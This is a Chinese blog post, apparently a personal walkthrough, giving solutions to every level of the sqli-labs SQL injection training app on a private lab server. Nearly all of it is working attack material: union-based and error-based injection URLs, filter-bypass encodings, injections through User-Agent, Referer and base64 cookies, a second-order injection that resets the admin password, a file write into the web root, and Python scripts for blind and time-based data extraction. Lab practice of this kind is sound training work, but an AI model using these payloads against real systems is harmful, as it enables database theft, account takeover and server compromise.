sqli-labs通关记录

环境搭建:https://www.cnblogs.com/kagari/p/11910749.html

总体感受:sqli-labs还是只适合入门

在此基础上添加了一个flag数据库,库名flag,表名flag,字段名flag

Less-1

http://172.16.124.149/Less-1/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23

Less-2

http://172.16.124.149/Less-2/?id=0%20union%20select%201,2,flag%20from%20flag.flag

Less-3

http://172.16.124.149/Less-3/?id=0%27)%20union%20select%201,2,flag%20from%20flag.flag%23

Less-4

http://172.16.124.149/Less-4/?id=0%22)%20union%20select%201,2,flag%20from%20flag.flag%23

Less-5

http://172.16.124.149/Less-5/?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-6

http://172.16.124.149/Less-6/?id=0%22%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-7

secure_file_priv=/var/www/html

/var/www/html root:root 755

/var/www/html/tmp root:root 777

http://172.16.124.149/Less-7/?id=1%27))%20union%20select%201,2,%27%3C?php%20phpinfo();%27%20into%20outfile%20%27/var/www/html/tmp/phpinfo.php%27%23

Less-8

import requests
url='http://172.16.124.149/Less-8/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'You are in' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-9

import requests
import time
url='http://172.16.124.149/Less-9/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23".format(i=i,mid=hex(mid))
        t1=time.time()
        r=requests.get(url=url+payload)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-10

import requests
import time
url='http://172.16.124.149/Less-10/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='0"^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23'.format(i=i,mid=hex(mid))
        t1=time.time()
        r=requests.get(url=url+payload)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-11

post:

passwd=&uname=' union select 1,(select flag from flag.flag)%23

Less-12

post:

passwd=&uname=") union select 1,(select flag from flag.flag)%23

Less-13

post:

passwd=&uname=') union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-14

post:

passwd=&uname=" union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-15

import requests
import time
url='http://172.16.124.149/Less-15/'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#".format(i=i,mid=hex(mid))
        data={'passwd':'','uname':payload}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-16

import requests
import time
url='http://172.16.124.149/Less-16/'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='")^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#'.format(i=i,mid=hex(mid))
        data={'passwd':'','uname':payload}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-17

post:

passwd='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&uname=Dhakkan

Less-18

POST /Less-18/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'','')#
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.124.149/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb&passwd=Dumb

Less-19

POST /Less-19/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'')#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb&passwd=Dumb

Less-20

GET /Less-20/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Less-21

base64编码:')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#

GET /Less-21/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname=JyleKHNlbGVjdCBjb3VudCgqKSBmcm9tIG15c3FsLnVzZXIgZ3JvdXAgYnkgY29uY2F0KChzZWxlY3QgZmxhZyBmcm9tIGZsYWcuZmxhZyksZmxvb3IocmFuZCgwKSoyKSkpIw==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Less-22

base64编码:"^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#

GET /Less-22/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: 
Cookie: uname=Il4oc2VsZWN0IGNvdW50KCopIGZyb20gbXlzcWwudXNlciBncm91cCBieSBjb25jYXQoKHNlbGVjdCBmbGFnIGZyb20gZmxhZy5mbGFnKSxmbG9vcihyYW5kKDApKjIpKSkj==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Less-23

http://172.16.124.149/Less-23/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag;%00

Less-24

由于字段长度限制20位,该题只能做到任意用户密码修改

注册:admin'#/123

登陆后修改密码:current_password=123&password=admin&re_password=admin&submit=Reset

admin的密码变为admin

update语句:UPDATE users SET PASSWORD='admin' where username='admin'#' and password='123'

Less-25

http://172.16.124.149/Less-25/?id=%27%20union%20select%201,flag,3%20from%20flag.flag%23

Less-25a

http://1172.16.124.149/Less-25a/?id=0%20union%20select%201,2,flag%20from%20flag.flag

Less-26

http://172.16.124.149/Less-26/?id=%27%a0union%a0select%a01,flag,3%a0from%a0flag.flag;%00

Less-26a

http://127.0.0.1:8080/Less-26a/?id=0%27)union%a0select%a01,2,flag%a0from%a0flag.flag;%00

Less-27

http://172.16.124.149/Less-27/?id=%27%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

Less-27a

http://172.16.124.149/Less-27a/?id=%22%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

Less-28

http://172.16.124.149/Less-28/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

Less-28a

http://172.16.124.149/Less-28a/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00

Less-29

http://172.16.124.149/Less-29/?id=%27%20union%20select%201,flag,3%20from%20flag.flag;%00

Less-30

http://172.16.124.149/Less-30/?id=%22%20union%20select%201,flag,3%20from%20flag.flag%23

Less-31

http://172.16.124.149/Less-31/?id=%22)%20%20union%20select%201,flag,3%20from%20flag.flag%23

Less-32

http://172.16.124.149/Less-32/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23

Less-33

http://172.16.124.149/Less-33/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23

Less-34

post:

passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23

Less-35

http://172.16.124.149/Less-35/?id=0%20union%20select%201,flag,3%20from%20flag.flag%23

Less-36

http://172.16.124.149/Less-36/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23

Less-37

post:

passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23

Less-38

http://172.16.124.149/Less-38/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23

Less-39

http://172.16.124.149/Less-39/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23

Less-40

http://172.16.124.149/Less-40/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23

Less-41

http://172.16.124.149/Less-41/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23

Less-42

post:

login_password='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login

Less-43

post:

login_password=')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login

Less-44

import requests
import time
url='http://172.16.124.149/Less-44/login.php'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid))
        data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-45

import requests
import time
url='http://172.16.124.149/Less-45/login.php'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="')^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid))
        data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'}
        t1=time.time()
        r=requests.post(url=url,data=data)
        t2=time.time()
        if t2-t1 > 0.2:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-46

http://172.16.124.149/Less-46/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));

Less-47

http://172.16.124.149/Less-47/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23

Less-48

import requests
import time
url='http://172.16.124.149/Less-48/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128
    
    while right-left!=1:
        mid=(left+right)/2
        payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-49

import requests
import time
url='http://172.16.124.149/Less-49/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-50

http://172.16.124.149/Less-50/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));

Less-51

http://172.16.124.149/Less-51/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23

Less-52

import requests
import time
url='http://172.16.124.149/Less-52/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-53

import requests
import time
url='http://172.16.124.149/Less-53/?sort=1'
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'admin' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-54

http://172.16.124.149/Less-54/index.php?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23

Less-55

http://172.16.124.149/Less-55/?id=0)%20union%20select%201,2,flag%20from%20flag.flag%23

Less-56

http://172.16.124.149/Less-56/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23

Less-57

http://172.16.124.149/Less-57/?id=%22%20union%20select%201,2,flag%20from%20flag.flag%23

Less-58

http://172.16.124.149/Less-58/index.php?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-59

http://172.16.124.149/Less-59/?id=0%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-60

http://172.16.124.149/Less-60/?id=%22)%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-61

http://172.16.124.149/Less-61/?id=%27))%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23

Less-62

import requests
import time
url='http://172.16.124.149/Less-62/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0%27)^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-63

import requests
import time
url='http://172.16.124.149/Less-63/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0%27^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-64

import requests
import time
url='http://172.16.124.149/Less-64/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload="0))^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

Less-65

import requests
import time
url='http://172.16.124.149/Less-65/?id='
flag=''
for i in range(1,20):
    left=33
    right=128

    while right-left!=1:
        mid=(left+right)/2
        payload='0")^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23'.format(i=i,mid=hex(mid))
        r=requests.get(url=url+payload)
        if 'dhakkan' in r.text:
            left=mid
        else:
            right=mid
    flag+=chr(right)
    print flag

 

posted @ 2019-11-25 18:34  ~kagi~  阅读(3064)  评论(0编辑  收藏  举报